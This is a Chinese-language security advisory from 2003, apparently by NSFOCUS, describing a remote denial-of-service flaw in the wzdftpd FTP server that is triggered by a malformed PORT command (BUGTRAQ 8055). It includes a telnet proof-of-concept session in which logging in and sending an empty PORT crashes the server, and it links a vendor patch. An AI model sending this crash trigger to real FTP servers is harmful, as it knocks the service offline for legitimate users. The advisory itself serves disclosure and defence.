安全研究

安全漏洞
WZDFTPD畸形PORT命令远程拒绝服务攻击漏洞

发布日期:2003-06-27
更新日期:2003-07-04

受影响系统:
wzdftpd wzdftpd
描述:
BUGTRAQ  ID: 8055

wzdftpd是一款可移植,模块化的FTP服务器,支持SSL、Winsock、多线程等。

wzdftpd没有正确处理畸形PORT命令,远程攻击者可以利用这个漏洞对FTP服务进行拒绝服务攻击。

当接收到不完整或畸形FTP PORT命令请求时,服务器会崩溃,停止对所有授权用户的响应。

<*来源:Roman Bogorodskiy (bogorodskiy@inbox.ru
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105674242105302&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Roman Bogorodskiy <bogorodskiy@inbox.ru>提供了如下的测试方法:

$> telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
$> telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

建议:
厂商补丁:

wzdftpd
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.wzdftpd.net/download.html

浏览次数:2974
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障